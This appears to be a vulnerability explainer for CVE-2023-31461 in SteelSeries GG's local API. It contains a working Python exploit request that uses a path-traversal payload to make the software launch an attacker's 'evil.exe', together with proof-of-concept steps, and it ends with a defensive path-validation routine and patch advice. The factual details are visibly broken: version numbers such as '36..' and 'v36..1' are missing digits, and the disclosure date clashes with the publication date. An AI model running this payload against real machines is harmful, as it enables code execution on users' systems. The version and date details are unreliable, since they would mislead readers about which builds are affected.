SteelSeries GG is a popular gaming software suite used worldwide to manage hardware, macros, and other features on SteelSeries peripherals. On April 24th, 2023, a critical vulnerability (CVE-2023-31461) was disclosed that opens the door for attackers to execute their malicious code by exploiting the software’s open API listener. In simple terms, hackers can use a flaw in the way SteelSeries GG handles sub-application installations to force the software to run whatever program they want, from a location they control.
Let’s break down how CVE-2023-31461 works, what makes it dangerous, and how you might test for or protect against it.
What Is CVE-2023-31461?
When SteelSeries GG version 36.. is running, it starts an API listener—a background server that lets other applications interact with GG (like installing new features or "sub-apps"). The problem is:
This API listener does not validate file paths properly. By supplying a path traversal sequence (for example, ../ to step up into a parent directory), an attacker can make it load and run a program stored anywhere on the system.
So, with the right request, an attacker can make GG automatically launch a malicious “sub-app” from their chosen folder.
Risk: This leads to REMOTE CODE EXECUTION (RCE) on the victim’s machine, with all the permissions given to SteelSeries GG.
Original References
- Vulnerabilities Detail: CVE-2023-31461
- SSD Disclosure: SteelSeries GG API Path Traversal RCE
- SteelSeries GG Release Notes / Acknowledgment
Craft Path-Traversal Payload
The exploit makes an API request to GG, telling it to “install” a new sub-app. But instead of a safe path, it uses ../ tricks to point GG toward the attacker’s .exe file.
Example Attack Request
Here’s a Python code example of how an attacker could exploit the vulnerable endpoint.
```python
import requests

# API endpoint (replace the port with the actual listening port found on the victim)
api_url = "http://localhost:61191/api/v1/gg/subapps/install"

# Path traversal payload: the relative path walks up out of GG's sub-app
# directory so that the installer runs C:\Temp\evil.exe instead
payload = {
    "path": "..\\..\\..\\..\\..\\Temp\\evil.exe",
    "subapp_name": "MaliciousApp",
}

response = requests.post(api_url, json=payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
```
By sending this request, the SteelSeries GG service will try to install and run C:\Temp\evil.exe—no questions asked.
Proof-of-Concept (PoC)
In real attacks, code like this can be executed locally by malware, or remote attackers could chain a web-based vulnerability to target the GG listener. Detection is hard because the malicious code runs under a signed process.
A functional PoC is shared by SSD Disclosure (see their writeup), where you:
1. Place your .exe in a known writable directory (like the user's Temp directory).
2. Use the API to point GG’s sub-app installer to your malicious file using ../../../ path tricks.
How Can You Protect Yourself?
SteelSeries patched this vulnerability in v36..1.
If you use SteelSeries GG, make sure to update immediately. You can get the latest version here.
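The kind of check that closes this class of bug, as an added example that is not SteelSeries' code: resolve the requested sub-app path against a fixed install root using Windows path semantics and refuse anything that does not stay inside that root. The root directory and the request shape are assumptions modelled on the request shown above.

```python
import ntpath
from typing import Optional

# Assumed sub-app install root (hypothetical; not SteelSeries' real layout).
# ntpath is used so Windows path rules apply no matter where this runs.
SUBAPP_ROOT = r"C:\Program Files\SteelSeries\GG\subapps"


def resolve_subapp_path(requested: str, root: str = SUBAPP_ROOT) -> Optional[str]:
    """Return the normalized path if it stays inside root, else None.

    Rejects absolute, drive-relative and UNC paths up front, then normalizes
    the remaining ..\\ or ../ segments and compares path components rather
    than string prefixes, so ..\\subapps_evil\\x.exe is caught as well.
    """
    if ntpath.isabs(requested) or ntpath.splitdrive(requested)[0]:
        return None
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, requested))
    try:
        common = ntpath.commonpath([root_norm, candidate])
    except ValueError:  # different drives, or absolute mixed with relative
        return None
    if ntpath.normcase(common) != ntpath.normcase(root_norm):
        return None
    return candidate


def validate_install_request(payload: dict) -> tuple:
    """Apply the containment check to a JSON body shaped like the one above."""
    requested = payload.get("path")
    if not isinstance(requested, str) or not requested:
        return (False, "missing path")
    resolved = resolve_subapp_path(requested)
    if resolved is None:
        return (False, "path escapes sub-app root")
    return (True, resolved)


if __name__ == "__main__":
    # Constructed requests: the traversal payload from the write-up and a benign one
    evil = {"path": "..\\..\\..\\..\\..\\Temp\\evil.exe", "subapp_name": "MaliciousApp"}
    good = {"path": "MyApp\\MyApp.exe", "subapp_name": "MyApp"}
    print(validate_install_request(evil))  # (False, 'path escapes sub-app root')
    print(validate_install_request(good))  # (True, 'C:\\Program Files\\...\\MyApp.exe')
```

Logging the rejected request (source port, raw path, resolved path) at this point gives defenders a concrete signal to alert on.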
Conclusion
CVE-2023-31461 shows how tiny mistakes in access controls and file path checks can lead to massive risks in popular programs. Always patch promptly and pay attention to the software that hides in the background—it can become an attacker’s best friend if left unchecked.
Further Reading
- CVE-2023-31461 on NVD
- SSD Disclosure Write-up
- Official SteelSeries GG Download
Timeline
Published on: 07/20/2023 18:15:00 UTC
Last modified on: 07/27/2023 23:40:00 UTC